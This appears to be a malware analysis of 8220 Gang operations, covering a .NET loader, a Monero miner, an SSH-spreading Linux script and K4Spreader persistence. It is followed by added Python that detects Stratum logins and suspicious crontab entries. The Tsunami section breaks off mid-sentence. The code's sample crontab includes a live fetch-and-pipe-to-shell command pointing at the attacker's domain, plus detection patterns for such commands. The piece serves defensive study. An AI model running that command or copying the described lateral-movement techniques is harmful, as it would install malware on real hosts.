Author: Admin | 2025-04-28
Attributed to Gang 8220.

Figure 3. Windows infection routine

Loader

CCleaner is a loader written in .NET that performs the following actions:
- It downloads a file from a specified URL: “hxxp://154.213.192[.]44/Ueordwfkay.pdf”.
- The file is loaded into memory and decrypted using 3DES, resulting in a .NET DLL.
- A class from the DLL is then loaded. While the exact invocation is unclear, this step downloads and executes an encrypted payload from “hxxp://154.213.192[.]44/plugin3.dll”.
- Finally, it launches the cryptominer.

Cryptominer

The cryptominer mines Monero through a private mining pool at 51.222.111[.]116:80, using the wallet 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ. AhnLab Security Emergency Response Center, in an April 2023 report, documented a similar infection chain involving this same wallet, linking it to the 8220 Gang.

Figure 4. pcap of the mining activity – Windows case

Linux

The infection starts with the execution of two scripts: a shell script named “c” and a Python script named “y”.

The “c” script carries out three main tasks: disabling cloud protection tools such as Aliyun's, downloading and executing the Hadooken payload, and attempting to spread across the internal network over SSH. To move laterally, the script inspects several files, including the bash history, “/etc/hosts” and “.ssh/config”, and builds lists of candidate targets to iterate through in an SSH brute-force attempt. If a login succeeds, it downloads and executes the initial infection script (the “c” script) on the new host.

The “y” script simply downloads and runs the Hadooken malware.

Figure 5. Linux infection routine

K4Spreader

K4Spreader is a Go-based malware, named Goku in the observed case, likely a reference to the character from the Dragon Ball manga. In its report, AquaSec suggests that the name “Hadooken” is a reference to the “Surge Fist” attack from the Street Fighter game.
Similarly, the name “Goku” follows the same thematic connection.

The malware performs several malicious actions:
- disabling various cloud security mechanisms;
- searching for and terminating competing cryptomining processes to take control of the host's resources;
- deploying additional malware, including the Tsunami backdoor and a PwnRig cryptominer, likely mining Monero;
- establishing persistence through cron by creating two crontab entries: one that executes itself every 2 minutes and another that downloads the “c” script from “hxxp://sck-dns[.]cc/c” and runs it every 5 minutes.

In June 2024, XLab, a Chinese cybersecurity firm, also reported on the 8220 Gang's use of K4Spreader.

The analysed sample is not obfuscated, and its function names are notably clear and descriptive. While most are in English, some are in Portuguese, which is unexpected given that the intrusion set is believed to be of Chinese origin.

Tsunami

Tsunami is a Linux-based malware primarily
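Two of the indicators above translate directly into host and network checks: the Stratum login to the private pool on port 80 (Cryptominer section) and the two K4Spreader crontab entries (persistence bullet). The Python below is an added example written for this page, not code from the report or from the 8220 Gang's tooling. The sample flows and crontab lines are constructed; the binary path /tmp/goku and the XMRig-style agent string are assumptions, and the wallet, pool and sck-dns URL are the report's indicators re-fanged so that they match live data.

```python
"""Added triage example (not the report's or the malware's code).

inspect_stratum(): finds XMRig-style Stratum 'login' JSON-RPC messages
carrying a Monero wallet, and notes when they go to a web port.
inspect_crontab(): finds very frequent cron entries that fetch a URL,
pipe into a shell, or run from a world-writable directory.
"""
import json
import re

# Standard Monero address: 95 base58 characters starting with '4'.
MONERO_ADDR = re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$")

# Indicators quoted in the report, re-fanged so they match live data.
KNOWN_WALLET = ("46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dh"
                "EmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ")
KNOWN_POOL = ("51.222.111.116", 80)
WEB_PORTS = {80, 443, 8080}


def inspect_stratum(flows):
    """flows: iterable of (dst_ip, dst_port, first_payload_str), e.g. carved
    from a pcap or a proxy log. Returns one finding per Stratum login."""
    findings = []
    for dst_ip, dst_port, payload in flows:
        try:
            msg = json.loads(payload)
        except ValueError:          # plain HTTP and other non-JSON traffic
            continue
        if not isinstance(msg, dict) or msg.get("method") != "login":
            continue
        params = msg.get("params") or {}
        wallet = str(params.get("login", ""))
        if not MONERO_ADDR.match(wallet):
            continue
        findings.append({
            "dst": f"{dst_ip}:{dst_port}",
            "wallet": wallet,
            "known_wallet": wallet == KNOWN_WALLET,
            "known_pool": (dst_ip, dst_port) == KNOWN_POOL,
            # Stratum on 80/443 is the 'blend into web traffic' trick of Figure 4.
            "web_port": dst_port in WEB_PORTS,
            "agent": params.get("agent", ""),
        })
    return findings


CRON_FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*?https?://(\S+)")
CRON_PIPE_SH = re.compile(r"\|\s*(?:ba)?sh\b")
CRON_TMP_EXEC = re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/\S+")


def cron_interval_minutes(schedule):
    """Minute step for '*/N * * * *' (or '* * * * *') entries; None otherwise."""
    fields = schedule.split()
    if len(fields) != 5 or fields[1:] != ["*"] * 4:
        return None
    minute = fields[0]
    if minute == "*":
        return 1
    if minute.startswith("*/") and minute[2:].isdigit():
        return int(minute[2:])
    return None


def inspect_crontab(text, max_minutes=5):
    """Flag entries firing every max_minutes or less that fetch a URL,
    pipe into a shell, or execute from a world-writable directory."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        interval = cron_interval_minutes(" ".join(parts[:5]))
        command = parts[5]
        if interval is None or interval > max_minutes:
            continue
        fetch = CRON_FETCH.search(command)
        if fetch or CRON_PIPE_SH.search(command) or CRON_TMP_EXEC.search(command):
            findings.append({"interval_min": interval,
                             "url": fetch.group(1) if fetch else None,
                             "command": command})
    return findings


# Constructed samples: a Stratum login modelled on the report's description of
# Figure 4 plus an ordinary HTTP request; two crontab lines modelled on the
# K4Spreader entries (/tmp/goku and the agent string are assumptions).
SAMPLE_FLOWS = [
    ("51.222.111.116", 80, json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login",
        "params": {"login": KNOWN_WALLET, "pass": "x", "agent": "XMRig/6.x"}})),
    ("93.184.216.34", 80, "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
]
SAMPLE_CRONTAB = """\
*/2 * * * * /tmp/goku
*/5 * * * * curl -fsSL http://sck-dns.cc/c | sh
0 3 * * * /usr/bin/certbot renew
"""

if __name__ == "__main__":
    for f in inspect_stratum(SAMPLE_FLOWS):
        print("stratum login:", f)
    for f in inspect_crontab(SAMPLE_CRONTAB):
        print("cron persistence:", f)
```

The wallet check is deliberately generic (any standard Monero address in a Stratum login, not only the one above), so the same function still fires if the operators rotate wallets; the pool and wallet comparisons then only add attribution. The cron check keys on frequency plus fetch-and-pipe or execution from /tmp-style paths, which is the shape of both K4Spreader entries, rather than on the sck-dns domain alone.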